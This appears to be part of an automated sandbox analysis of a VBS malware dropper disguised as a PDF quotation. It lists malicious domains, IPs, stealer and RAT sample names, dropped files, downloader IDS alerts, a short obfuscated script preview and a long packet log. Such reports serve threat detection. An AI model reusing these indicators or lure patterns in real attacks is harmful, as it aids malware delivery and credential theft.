bg.microsoft.map.fastly.net | https://www.google.ad/amp/clck.ru/3DSSA9?hghgHGHGHJGhghdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | yVhGfho0R4.exe | malicious | Remcos | 199.232.214.172
bg.microsoft.map.fastly.net | https://pokerfanboy.com/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://polap77.com/ | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | https://pokegamaclub.com/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | Transmission Cost Database 2.0.xlsb | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://okfun188.com/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://mukirecords.com/ | malicious | Unknown | 199.232.214.172
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | http://hrlaw.com.au | malicious | Unknown | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | CAPE MARS VSL'S PARTICULARS.docx.exe | malicious | AgentTesla, PureLog Stealer | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | MV TASOS Vessel's Details.docx.exe | malicious | AgentTesla, PureLog Stealer | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | AgentTesla | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | https://okfun188.com/ | malicious | Unknown | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | https://mukirecords.com/ | malicious | Unknown | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | https://thepeaceapproach.net/ | malicious | Unknown | 142.250.186.33, 142.250.186.174
3b5074b1b5d032e5620f69f9f700ff0e | https://cpanel.whitewestinghouse.com.py/ | malicious | Unknown | 142.250.186.33, 142.250.186.174
                                  No context
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                  Category:dropped
                                  Size (bytes):71954
                                  Entropy (8bit):7.996617769952133
                                  Encrypted:true
                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):328
                                  Entropy (8bit):3.2429904267830576
                                  Encrypted:false
                                  SSDEEP:6:kKgpZi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:opvDImsLNkPlE99SNxAhUe/3
                                  MD5:5CCB347A9339E54E7656DB893F54D576
                                  SHA1:01596A71DA70BFD12417DACDD026046DB8EE0666
                                  SHA-256:648AAF87F73C950F081D7E83EF8C0583A7874222FA7E61E8F4CD7FE731172E3D
                                  SHA-512:402393A1E89D8394496DE710F6A73407DBA201E8BF9FB69E03985CE525B3A51AD33EF86AC57D384D6F10AB5710D58C33144FB3ACC9B88DE6BDC04316CA7D441A
                                  Malicious:false
                                  Reputation:low
                                  Preview:p...... .........u.x....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):11608
                                  Entropy (8bit):4.890472898059848
                                  Encrypted:false
                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  File type:ASCII text, with very long lines (2129), with CRLF line terminators
                                  Entropy (8bit):5.9430873985827155
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:Urgent Quotation Notification_pdf.vbs
                                  File size:22'363 bytes
                                  MD5:9399cd1db4c7360b891ecc977dfbdc2a
                                  SHA1:968f602adcb6c30b6a6f3520bf90f17d9511e7c7
                                  SHA256:ee0a0898ddb59aa40d7c429d982e56a1ca4847a2872b857a1a3934d316075576
                                  SHA512:dc65b802977945138bc50a01f65d5b5ef51db05a36cc8058f93ff03ce571d9cfeef13ab7d2ae932bda0d1c1abcc19c76c63603f92dcd22c65f0158600ecddf61
                                  SSDEEP:384:5Ct1s/AY/KNCARVZLDLEYlXEEanhC4ZscgniCwyvN2vYiWdgPTwRUQBXANeu:8tiYY/KNCsZjELEOC4ZNPoggibPTwRUL
                                  TLSH:77A27E996D6010DA145359F385CE39B8C11C26F72A71A8B95C5CF8329E0A3747EACCAF
                                  File Content Preview:..If Kanvasser("C:\") <> vbnullstring then ....Set Tusklike = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\r" + "oot\cimv2")....end if ......Set Centrifugerne = Tusklike.ExecQuery("Select * from Win32_Service")....on error resume next......For
                                  Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-30T09:58:13.830927+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49710 | 142.250.186.33 | 443 | TCP
2024-09-30T09:58:29.041282+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49716 | 142.250.186.174 | 443 | TCP
2024-09-30T09:58:54.549717+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 57672 | 142.250.186.174 | 443 | TCP
2024-09-30T09:59:04.582563+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 57674 | 142.250.186.174 | 443 | TCP
2024-09-30T09:59:30.054853+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 57680 | 142.250.186.174 | 443 | TCP
2024-09-30T09:59:41.117471+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 57682 | 142.250.186.174 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Sep 30, 2024 09:58:44.480987072 CEST44357668142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:44.481050014 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:44.481350899 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.492892981 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.492939949 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:48.493052006 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.493248940 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.493264914 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.122517109 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.123923063 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:49.123951912 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.503328085 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.503609896 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.503686905 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:49.504002094 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515289068 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515331984 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:53.515409946 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515728951 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515739918 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.147476912 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.148694992 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:54.148705959 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.549726009 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.550667048 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.550720930 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:54.551075935 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571369886 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571415901 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:58.571508884 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571749926 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571763992 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.229530096 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.230695009 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:59.230710030 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.624577045 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.625236988 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:59.625300884 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.625350952 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633477926 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633528948 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:03.633706093 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633913040 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633924007 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.271814108 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.271962881 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.272592068 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.272656918 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.274465084 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.274478912 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.274991035 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.275902033 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.319403887 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.582541943 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.583158016 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.583209038 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.583597898 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.586734056 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.586779118 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:08.586920023 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.587141037 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.587152958 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.216516972 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.217956066 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:09.217978001 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.605846882 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.608652115 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.608786106 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:09.609061003 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:09.609880924 CEST57676443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:09.609925032 CEST44357676142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:09.609972000 CEST57676443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:13.602379084 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:13.602440119 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:13.602526903 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:13.602756023 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:13.602771044 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.318661928 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.320445061 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:14.320548058 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.711661100 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.712701082 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.712793112 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:14.720526934 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.754765034 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.754815102 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:18.754901886 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.758980036 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.759012938 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.559628010 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.561242104 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:19.561342001 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.947453976 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.948359966 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.948467016 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:19.948957920 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.961688042 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.961746931 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:23.961858988 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.962061882 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.962071896 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.600171089 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.602531910 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:24.602554083 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.995028973 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.995884895 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.995989084 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:24.996392965 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.008672953 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.008718967 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:29.008810043 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.009048939 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.009059906 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:29.655081034 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:29.657428980 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.657442093 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:30.054862976 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:30.054939985 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:30.055016041 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:30.055422068 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.056608915 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.056653976 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:34.056725979 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.057023048 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.057034969 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:35.695902109 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:35.697290897 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:35.697319031 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:36.081360102 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:36.082071066 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:36.082200050 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:36.082516909 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.087515116 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.087563992 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:40.090758085 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.090758085 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.090795040 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:40.722073078 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:40.723763943 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.723795891 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:41.117463112 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:41.118987083 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:41.119039059 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:41.119489908 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:41.120271921 CEST57683443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:41.120322943 CEST44357683142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:41.120373964 CEST57683443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:45.338329077 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.338375092 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:45.338429928 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.338793039 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.338809967 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:45.982110977 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:45.990789890 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.990820885 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358124018 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358654022 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:46.358719110 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358866930 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:46.358870983 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358978033 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.352560997 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.352618933 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:50.354130983 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.354444027 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.354456902 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.012717962 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.012836933 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.013494015 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.013566971 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.017061949 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.017077923 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.017385960 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.018192053 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.063402891 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.397420883 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.399185896 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.399236917 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.406550884 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.414117098 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.414166927 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:51.414235115 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.414706945 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.414717913 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:51.415522099 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.459398985 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:52.072115898 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:52.072175980 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:52.072242975 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:55.434231997 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:55.434283018 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:55.434343100 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:55.434727907 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:55.434736967 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.075587034 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.083451033 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:56.083482981 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.455394030 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.456584930 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.456721067 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:56.457335949 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479460955 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479507923 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:00.479852915 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479852915 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479883909 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.116579056 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.118005037 CEST57688443192.168.2.9142.250.186.174
